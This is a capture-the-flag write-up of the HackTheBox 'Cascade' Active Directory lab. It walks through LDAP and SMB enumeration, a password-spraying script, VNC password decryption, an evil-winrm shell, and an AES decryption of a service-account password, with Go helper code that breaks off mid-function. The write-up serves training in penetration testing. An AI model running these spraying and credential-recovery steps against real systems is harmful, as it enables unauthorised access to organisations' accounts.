HackTheBox - Cascade

Cascade was a fun 30 point box created by VbScrub. It starts with anonymous LDAP enumeration that turns up a Base64-encoded password in a custom attribute, which gets you onto SMB as r.thompson. A share there holds a TightVNC registry export with an obfuscated password; VNC "encrypts" stored passwords with a fixed, public DES key, so a few lines in Metasploit's interactive Ruby shell recover it, and it gets you a WinRM session and user.txt as s.smith. For root you pull an audit tool and its SQLite database from a second share, decrypt an AES-encrypted password with the key and IV lifted out of the .NET binaries, and log in as the ArkSvc service account. That account is in a custom AD Recycle Bin group, which lets it read the attributes of a deleted TempAdmin account, and the legacy password stored on that object is the Administrator password.

User.txt

Nmap


A quick nmap scan reveals the following ports:

# nmap -sT -p- --min-rate 5000 10.10.10.182

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown

Focusing on the more important ports we get the following information:

# nmap -sV -sC -T4 10.10.10.182 -p 53,389,445

PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 
445/tcp open  microsoft-ds?
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m48s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-24T10:16:45
|_  start_date: 2020-07-24T04:15:36


SMB


Running nullinux against the host, an RPC null session is enough to pull the list of domain users:

# nullinux -users 10.10.10.182                                         
                                         
    Starting nullinux v5.4.1 | 07-24-2020 06:12
                                                 
[*] Enumerating Domain Information for: 10.10.10.182
[+] Domain Name: CASCADE                                                          
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453 
[+] Group: Domain Users
    administrator
    krbtgt
    arksvc
    s.smith
    r.thompson
    util
    j.wakefield
    s.hickson
    j.goodhand
    a.turnbull
    e.crowe
    b.hanson
    d.burman
    BackupSvc
    j.allen
    i.croft

I saved these to a file (/root/users) for later password spraying. The null session did not let me list or read any shares, so I moved on to see what LDAP would hand out.


LDAP


The following search uses a simple anonymous bind (-x with no -D) and dumps every object of class Person, i.e. the user accounts with their logon counts, sAMAccountName and so on. That this works at all is a finding in itself: by default a domain controller only answers anonymous queries against the rootDSE, so anonymous reads have been deliberately enabled here. Note that newer ldapsearch builds have dropped -h in favour of -H ldap://10.10.10.182:

# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)'

# CascGuest, Users, cascade.local                                                                                                                                       
dn: CN=CascGuest,CN=Users,DC=cascade,DC=local                                                                                                                           
objectClass: top                                                                  
objectClass: person                                                               
objectClass: organizationalPerson                                                 
objectClass: user                                                                 
cn: CascGuest                                                                     
description: Built-in account for guest access to the computer/domain             
distinguishedName: CN=CascGuest,CN=Users,DC=cascade,DC=local                      
instanceType: 4                                                                   
whenCreated: 20200109153140.0Z                                                                                                                                      
whenChanged: 20200110160637.0Z                                                    
uSNCreated: 8197                                                                  
memberOf: CN=Guests,CN=Builtin,DC=cascade,DC=local                                  
uSNChanged: 45094                    
name: CascGuest                      
objectGUID:: LrFX+qgBukGjmV+ZFABrZw==
userAccountControl: 66082
badPwdCount: 0    
codePage: 0       
countryCode: 0     
badPasswordTime: 0                                                                
lastLogoff: 0                                                                     
lastLogon: 0                                                                       
pwdLastSet: 0                                                                      
primaryGroupID: 514                                                                
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJF9QEAAA==                              
accountExpires: 9223372036854775807                                               
logonCount: 0                                                                     
sAMAccountName: CascGuest                                                          
sAMAccountType: 805306368                                                          
userPrincipalName: CascGuest@cascade.local                                         
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local            
isCriticalSystemObject: TRUE            
dSCorePropagationData: 20200117033736.0Z  
dSCorePropagationData: 20200117001404.0Z  
dSCorePropagationData: 20200109175934.0Z  
dSCorePropagationData: 20200109154857.0Z  
dSCorePropagationData: 16010714223649.0Z  
lastLogonTimestamp: 132230700642958462    

# CASC-DC1, Domain Controllers, cascade.local                                       
dn: CN=CASC-DC1,OU=Domain Controllers,DC=cascade,DC=local 
...

This dumps a lot of information, however using grep we can narrow down the output significantly based on supplied keywords:

# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' | grep -i samaccountname
sAMAccountName: CascGuest
sAMAccountName: CASC-DC1$
sAMAccountName: arksvc
sAMAccountName: s.smith
sAMAccountName: r.thompson
sAMAccountName: util
sAMAccountName: j.wakefield
sAMAccountName: s.hickson
sAMAccountName: j.goodhand
sAMAccountName: a.turnbull
sAMAccountName: e.crowe
sAMAccountName: b.hanson
sAMAccountName: d.burman
sAMAccountName: BackupSvc
sAMAccountName: j.allen
sAMAccountName: i.croft

I decided to grep for specific strings like password, secret, key, user, etc. but these returned nothing particularly interesting.

Two attributes worth checking on every account are logonCount (does the account actually get used) and badPwdCount (is something repeatedly failing to authenticate as it, which can point at a stale script or warn you about an aggressive lockout policy). Grepping for pwd to pull those out also surfaced an attribute that is not part of the default AD schema, cascadeLegacyPwd:

# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=Person)' | grep -i pwd
badPwdCount: 0
pwdLastSet: 0
badPwdCount: 0
pwdLastSet: 132400377614404824
badPwdCount: 0
pwdLastSet: 132230603002172876
badPwdCount: 0
pwdLastSet: 132247150854857364
badPwdCount: 0
pwdLastSet: 132230718862636251
cascadeLegacyPwd: clk0bjVldmE=
badPwdCount: 0
pwdLastSet: 132233548311955855
badPwdCount: 0
pwdLastSet: 132230756844150124
badPwdCount: 0
pwdLastSet: 132233522678003963
badPwdCount: 0
pwdLastSet: 132233532260320793
badPwdCount: 0
pwdLastSet: 132233533933579732
badPwdCount: 0
pwdLastSet: 132233607021669462
badPwdCount: 0
pwdLastSet: 132234069391538655
badPwdCount: 0
pwdLastSet: 132234069729591249
badPwdCount: 0
pwdLastSet: 132234070231912131
badPwdCount: 0
pwdLastSet: 132234098399165604
badPwdCount: 0
pwdLastSet: 132235983818652005

The value is plain Base64, not encryption, and decodes to rY4n5eva:

# echo clk0bjVldmE= | base64 -d; echo
rY4n5eva
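Grepping for a keyword only finds what you already thought to look for. A more general check, written here as an added example rather than anything from the original writeup, is to parse the LDIF, list every attribute a stock user object would not carry, and try a Base64 decode on each of those values. The stockUserAttrs list and the sample dump (including the r.thompson DN) are assumptions constructed for the example; ParseLDIF also handles the "::" form ldapsearch uses for binary values such as objectSid, and the folded continuation lines it emits for long values:

```go
package main

import (
	"encoding/base64"
	"fmt"
	"sort"
	"strings"
)

type Entry struct {
	DN    string
	Attrs map[string][]string
}

// ParseLDIF reads ldapsearch-style LDIF: "attr: value", "attr:: base64" (binary
// values, decoded to raw bytes), "#" comments, folded lines and blank separators.
func ParseLDIF(text string) []Entry {
	var entries []Entry
	cur := Entry{Attrs: map[string][]string{}}
	// Unfold "newline + space" continuations; the extra "\n" flushes the last entry.
	for _, l := range strings.Split(strings.ReplaceAll(text, "\n ", "")+"\n", "\n") {
		if strings.TrimSpace(l) == "" {
			if cur.DN != "" {
				entries = append(entries, cur)
			}
			cur = Entry{Attrs: map[string][]string{}}
			continue
		}
		parts := strings.SplitN(l, ":", 2)
		if strings.HasPrefix(l, "#") || len(parts) != 2 {
			continue
		}
		name, val := parts[0], strings.TrimSpace(parts[1])
		if strings.HasPrefix(parts[1], ":") { // "attr:: ..." is an LDIF-level binary value
			raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(parts[1][1:]))
			if err != nil {
				continue
			}
			val = string(raw)
		}
		if strings.EqualFold(name, "dn") {
			cur.DN = val
		} else {
			cur.Attrs[name] = append(cur.Attrs[name], val)
		}
	}
	return entries
}

// stockUserAttrs is what a default AD user object carries (the CascGuest dump above plus
// common name attributes). An assumption for this example; tune it for the forest at hand.
const stockUserAttrs = "objectClass cn sn givenName displayName description distinguishedName instanceType whenCreated whenChanged uSNCreated uSNChanged memberOf name objectGUID userAccountControl badPwdCount codePage countryCode badPasswordTime lastLogoff lastLogon lastLogonTimestamp pwdLastSet primaryGroupID objectSid accountExpires logonCount sAMAccountName sAMAccountType userPrincipalName objectCategory isCriticalSystemObject dSCorePropagationData mail title department adminCount"

func isStock(name string) bool {
	return strings.Contains(" "+strings.ToLower(stockUserAttrs)+" ", " "+strings.ToLower(name)+" ")
}

// Finding is a non-stock attribute; Decoded is set when the value is itself Base64 that
// decodes to printable ASCII (a second, application-level encoding, as with cascadeLegacyPwd).
type Finding struct{ DN, Attr, Value, Decoded string }

func decodeIfPrintable(v string) string {
	raw, err := base64.StdEncoding.DecodeString(v)
	if err != nil || len(raw) == 0 || strings.IndexFunc(string(raw), func(r rune) bool { return r < 0x20 || r > 0x7e }) >= 0 {
		return ""
	}
	return string(raw)
}

// FindOddAttributes lists every non-stock attribute on every entry, sorted by DN then name.
func FindOddAttributes(entries []Entry) []Finding {
	var out []Finding
	for _, e := range entries {
		for name, vals := range e.Attrs {
			if isStock(name) {
				continue
			}
			for _, v := range vals {
				out = append(out, Finding{e.DN, name, v, decodeIfPrintable(v)})
			}
		}
	}
	sort.Slice(out, func(i, j int) bool { return out[i].DN+"|"+out[i].Attr < out[j].DN+"|"+out[j].Attr })
	return out
}

// sampleLDIF is a constructed, abridged dump in the shape of the output above; the r.thompson DN is invented.
const sampleLDIF = `# CascGuest, Users, cascade.local
dn: CN=CascGuest,CN=Users,DC=cascade,DC=local
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJF9QEAAA==

dn: CN=r.thompson,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: r.thompson
memberOf: CN=IT,OU=Groups,OU=UK,
 DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE=
`

func main() {
	for _, f := range FindOddAttributes(ParseLDIF(sampleLDIF)) {
		fmt.Printf("%s\n  %s: %s  (base64 -> %q)\n", f.DN, f.Attr, f.Value, f.Decoded)
	}
}
```

Point it at a saved ldapsearch dump by replacing sampleLDIF with the file contents. The baseline approach generalises beyond this box: shrinking stockUserAttrs (dropping description, for instance) surfaces the other classic places admins leave passwords, which a grep for pwd would never match.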

My crackmapexec install was not working at the time so I made a quick bash script to try the password against every account in the user list. One attempt per account stays well under any lockout threshold, unlike hammering a single account, and an LDAP filter on the attribute itself, (cascadeLegacyPwd=*), would have pointed straight at the owner:

#!/bin/bash
# Try one password against every account in /root/users over SMB.
# A single attempt per user will not trip a lockout policy.
while read -r user; do
    echo "User: $user"
    smbmap -H 10.10.10.182 -u "$user" -p 'rY4n5eva'
done < /root/users

Running the script shows that r.thompson is the correct user:

# ./smb.sh 
User: arksvc
[!] Authentication error on 10.10.10.182
User: s.smith
[!] Authentication error on 10.10.10.182
User: r.thompson
[+] IP: 10.10.10.182:445        Name: 10.10.10.182                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share 
User: util
[!] Authentication error on 10.10.10.182
User: j.wakefield
[!] Authentication error on 10.10.10.182
User: s.hickson
[!] Authentication error on 10.10.10.182
User: j.goodhand
[!] Authentication error on 10.10.10.182
User: a.turnbull
[!] Authentication error on 10.10.10.182
User: e.crowe
[!] Authentication error on 10.10.10.182
User: b.hanson
[!] Authentication error on 10.10.10.182
User: d.burman
[!] Authentication error on 10.10.10.182
User: BackupSvc
[!] Authentication error on 10.10.10.182
User: j.allen
[!] Authentication error on 10.10.10.182
User: i.croft
[!] Authentication error on 10.10.10.182


SMB


The Data share caught my eye: a directory named after the AD Recycle Bin, a log from a tool that uses it, and a VNC Install.reg in s.smith's Temp folder:

# smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -R 'Data'
[+] IP: 10.10.10.182:445        Name: 10.10.10.182                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Data                                                    READ ONLY
        .\Data\*
        dr--r--r--                0 Tue Jan 28 17:05:51 2020    .
        dr--r--r--                0 Tue Jan 28 17:05:51 2020    ..
        dr--r--r--                0 Sun Jan 12 20:45:14 2020    Contractors
        dr--r--r--                0 Sun Jan 12 20:45:10 2020    Finance
        dr--r--r--                0 Tue Jan 28 13:04:51 2020    IT
        dr--r--r--                0 Sun Jan 12 20:45:20 2020    Production
        dr--r--r--                0 Sun Jan 12 20:45:16 2020    Temps
        .\Data\IT\*
        dr--r--r--                0 Tue Jan 28 13:04:51 2020    .
        dr--r--r--                0 Tue Jan 28 13:04:51 2020    ..
        dr--r--r--                0 Tue Jan 28 13:00:30 2020    Email Archives
        dr--r--r--                0 Tue Jan 28 13:04:51 2020    LogonAudit
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    Logs
        dr--r--r--                0 Tue Jan 28 17:06:59 2020    Temp
        .\Data\IT\Email Archives\*
        dr--r--r--                0 Tue Jan 28 13:00:30 2020    .
        dr--r--r--                0 Tue Jan 28 13:00:30 2020    ..
        fr--r--r--             2522 Tue Jan 28 13:00:30 2020    Meeting_Notes_June_2018.html
        .\Data\IT\Logs\*
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    .
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    ..
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    Ark AD Recycle Bin
        dr--r--r--                0 Tue Jan 28 19:56:00 2020    DCs
        .\Data\IT\Logs\Ark AD Recycle Bin\*
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    .
        dr--r--r--                0 Tue Jan 28 19:53:04 2020    ..
        fr--r--r--             1303 Tue Jan 28 20:19:11 2020    ArkAdRecycleBin.log
        .\Data\IT\Logs\DCs\*
        dr--r--r--                0 Tue Jan 28 19:56:00 2020    .
        dr--r--r--                0 Tue Jan 28 19:56:00 2020    ..
        fr--r--r--             5967 Sun Jan 26 17:22:05 2020    dcdiag.log
        .\Data\IT\Temp\*
        dr--r--r--                0 Tue Jan 28 17:06:59 2020    .
        dr--r--r--                0 Tue Jan 28 17:06:59 2020    ..
        dr--r--r--                0 Tue Jan 28 17:06:55 2020    r.thompson
        dr--r--r--                0 Tue Jan 28 15:00:05 2020    s.smith
        .\Data\IT\Temp\s.smith\*
        dr--r--r--                0 Tue Jan 28 15:00:05 2020    .
        dr--r--r--                0 Tue Jan 28 15:00:05 2020    ..
        fr--r--r--             2680 Tue Jan 28 15:00:01 2020    VNC Install.reg

I then logged in with smbclient and recursively downloaded everything the account could read (Contractors, Finance, Production and Temps are listed but not readable as r.thompson):

# smbclient \\\\10.10.10.182\\Data -U=r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020

                13106687 blocks of size 4096. 7797638 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (7.6 KiloBytes/sec) (average 7.6 KiloBytes/sec) 
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (4.0 KiloBytes/sec) (average 5.8 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (18.1 KiloBytes/sec) (average 9.9 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (8.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
smb: \>

The output is then saved locally to Kali:

# ls
Contractors  Finance  IT  Production  Temps

You can then see the files that’ve been downloaded:

# find . -type f
./IT/Temp/s.smith/VNC Install.reg
./IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
./IT/Logs/DCs/dcdiag.log
./IT/Email Archives/Meeting_Notes_June_2018.html

The ArkAdRecycleBin.log file contained some interesting information:

# cat IT/Logs/Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log 
1/10/2018 15:43 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD]   Validating settings...
1/10/2018 15:43 [MAIN_THREAD]   Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD]   Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD]   Validating settings...
2/10/2018 15:56 [MAIN_THREAD]   Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD]   Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD]   Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD]   Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD]   ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD]   Validating settings...
8/12/2018 12:22 [MAIN_THREAD]   Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD]   Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD]   Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local 
8/12/2018 12:22 [MAIN_THREAD]   Exiting with error code 0

None of this is usable yet, but file it away: a service account called ArkSvc has rights to move objects into the AD Recycle Bin, and one of the objects it deleted was named TempAdmin. The VNC Install.reg file, a TightVNC server registry export, is more immediately useful because of a single value, "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f:

# cat IT/Temp/s.smith/VNC\ Install.reg 
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""


VNC Password Decryption


Googling the value format led me to a page on GitHub. TightVNC (like RealVNC and UltraVNC) does not hash the server password; it DES-encrypts it with a fixed, publicly known key, so the registry value is fully reversible. The page shows how to do it in three lines from msfconsole's interactive Ruby shell, reusing Metasploit's own RFB cipher code (the fixedkey bytes are the well-known VNC key with each byte bit-reversed, which is what a standard DES implementation needs):

msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6bcf2a4b6e5aca0f"].pack('H*'), fixedkey
=> "sT333ve2"

The password is sT333ve2. The file sat in s.smith's own Temp directory, so the obvious guess is that the same password is reused for that domain account.


Flag


That holds, and since WinRM (5985) is open and the account is allowed to use it, evil-winrm gives a shell and the user flag:

# evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ..
*Evil-WinRM* PS C:\Users\s.smith> type desktop/user.txt
aad2e8...


Root.txt

SMB


There wasn’t much to offer on the host logged in as s.smith so I decided to check out what shares the account had access to:

# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2
[+] IP: 10.10.10.182:445        Name: 10.10.10.182                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  READ ONLY
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share 

The Audit$ share stands out immediately. Recursively listing the contents of the share displays some interesting looking files:

# smbmap -H 10.10.10.182 -u s.smith -p sT333ve2 -R 'Audit$'
[+] IP: 10.10.10.182:445        Name: 10.10.10.182                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Audit$                                                  READ ONLY
        .\Audit$\*
        dr--r--r--                0 Wed Jan 29 13:01:26 2020    .
        dr--r--r--                0 Wed Jan 29 13:01:26 2020    ..
        fr--r--r--            13312 Tue Jan 28 16:47:08 2020    CascAudit.exe
        fr--r--r--            12288 Wed Jan 29 13:01:26 2020    CascCrypto.dll
        dr--r--r--                0 Tue Jan 28 16:43:18 2020    DB
        fr--r--r--               45 Tue Jan 28 18:29:47 2020    RunAudit.bat
        fr--r--r--           363520 Tue Jan 28 15:42:18 2020    System.Data.SQLite.dll
        fr--r--r--           186880 Tue Jan 28 15:42:18 2020    System.Data.SQLite.EF6.dll
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    x64
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    x86
        .\Audit$\DB\*
        dr--r--r--                0 Tue Jan 28 16:43:18 2020    .
        dr--r--r--                0 Tue Jan 28 16:43:18 2020    ..
        fr--r--r--            24576 Tue Jan 28 16:43:18 2020    Audit.db
        .\Audit$\x64\*
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    .
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    ..
        fr--r--r--          1639936 Tue Jan 28 15:42:18 2020    SQLite.Interop.dll
        .\Audit$\x86\*
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    .
        dr--r--r--                0 Tue Jan 28 15:42:18 2020    ..
        fr--r--r--          1246720 Tue Jan 28 15:42:18 2020    SQLite.Interop.dll

I then downloaded all of them using smbclient:

# smbclient \\\\10.10.10.182\\Audit$ -U=s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                13106687 blocks of size 4096. 7796288 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \CascAudit.exe of size 13312 as CascAudit.exe (32.6 KiloBytes/sec) (average 32.6 KiloBytes/sec)
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (37.2 KiloBytes/sec) (average 34.6 KiloBytes/sec)
getting file \DB\Audit.db of size 24576 as Audit.db (75.7 KiloBytes/sec) (average 47.2 KiloBytes/sec)
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.1 KiloBytes/sec) (average 36.3 KiloBytes/sec)
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (704.4 KiloBytes/sec) (average 217.9 KiloBytes/sec)
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (177.7 KiloBytes/sec) (average 203.6 KiloBytes/sec) 
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (1324.6 KiloBytes/sec) (average 535.0 KiloBytes/sec)
getting file \x86\SQLite.Interop.dll of size 1246720 as SQLite.Interop.dll (805.2 KiloBytes/sec) (average 607.9 KiloBytes/sec)
smb: \>


File Analysis


The Audit.db file caught my eye first. I opened it in sqliteonline.com (on a real engagement keep client data off third-party sites; sqlite3 on Kali does the same job). Running SELECT * FROM ldap; in the console shows the username ArkSvc alongside what looks like a Base64-encoded password:


Base64-decoding it just gives 16 bytes of binary junk, exactly one AES block. That, plus the CascCrypto.dll sitting next to the executable, suggests the value is encrypted and then Base64-encoded.


dnSpy


Throwing the DLL into dnSpy allowed me to see if there was a decrypt function that could be used to get the plaintext password for the ArkSvc account.


As you can see the encrypted string and the key are required for the decrypt function. I couldn’t find the key in the DLL so I chucked the CascAudit.exe executable into dnSpy to try and find the key.

After a quick look around I found the key in the following location:



Decrypt Function


I copied the decrypt function from the DLL into the dotnetfiddle.net online C# compiler, with a couple of small additions so it compiles stand-alone and writes the decrypted string to the console (the key is the one pulled from CascAudit.exe, the IV is the DefaultIV constant from the DLL):

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class Crypto
{
    public static void Main()
    {
        // Ciphertext from the ldap table in Audit.db, key from CascAudit.exe
        Console.WriteLine(DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321"));
    }

    // Lifted from CascCrypto.dll: AES-128-CBC with a fixed IV and PKCS#7 padding
    // (the CryptoStream default), Base64 on the outside
    public static string DecryptString(string EncryptedString, string Key)
    {
        byte[] array = Convert.FromBase64String(EncryptedString);
        Aes aes = Aes.Create();
        aes.KeySize = 128;
        aes.BlockSize = 128;
        aes.IV = Encoding.UTF8.GetBytes(DefaultIV);
        aes.Mode = CipherMode.CBC;
        aes.Key = Encoding.UTF8.GetBytes(Key);
        string @string;
        using (MemoryStream memoryStream = new MemoryStream(array))
        {
            using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
            {
                // The decompiled code sizes the buffer to the ciphertext and ignores how many
                // bytes Read() returned, which leaves trailing NULs after unpadding; use the count.
                byte[] array2 = new byte[array.Length];
                int read = cryptoStream.Read(array2, 0, array2.Length);
                @string = Encoding.UTF8.GetString(array2, 0, read);
            }
        }
        return @string;
    }

    // Token: 0x04000006 RID: 6
    public const string DefaultIV = "1tdyjCbY1Ix49842";

    // Token: 0x04000007 RID: 7
    public const int Keysize = 128;
}

Running the code displays the following decrypted password: w3lc0meFr31nd
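The same routine as an added Go example (not the author's code and not the box's), for when you would rather not paste a recovered key into an online compiler. It mirrors DecryptString (AES-128-CBC, the fixed IV from CascCrypto.dll, PKCS#7 padding, which is .NET's default) but validates the padding itself, so a wrong key surfaces as an error instead of silently printing garbage, and it includes the encrypt direction to confirm the recovered key and IV reproduce the stored ciphertext byte for byte. Key, IV and ciphertext are the values shown above:

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// Key and IV as recovered from CascAudit.exe and CascCrypto.dll in dnSpy above.
const (
	cascKey = "c4scadek3y654321" // 16 bytes -> AES-128
	cascIV  = "1tdyjCbY1Ix49842" // CascCrypto.Crypto.DefaultIV, the same for every record
)

// pkcs7Unpad validates and strips PKCS#7 padding. .NET's CryptoStream did this
// silently in the decompiled C# above; doing it by hand turns a wrong key into
// a padding error rather than garbage output.
func pkcs7Unpad(b []byte, blockSize int) ([]byte, error) {
	if len(b) == 0 || len(b)%blockSize != 0 {
		return nil, errors.New("pkcs7: length is not a multiple of the block size")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > blockSize {
		return nil, errors.New("pkcs7: bad padding length")
	}
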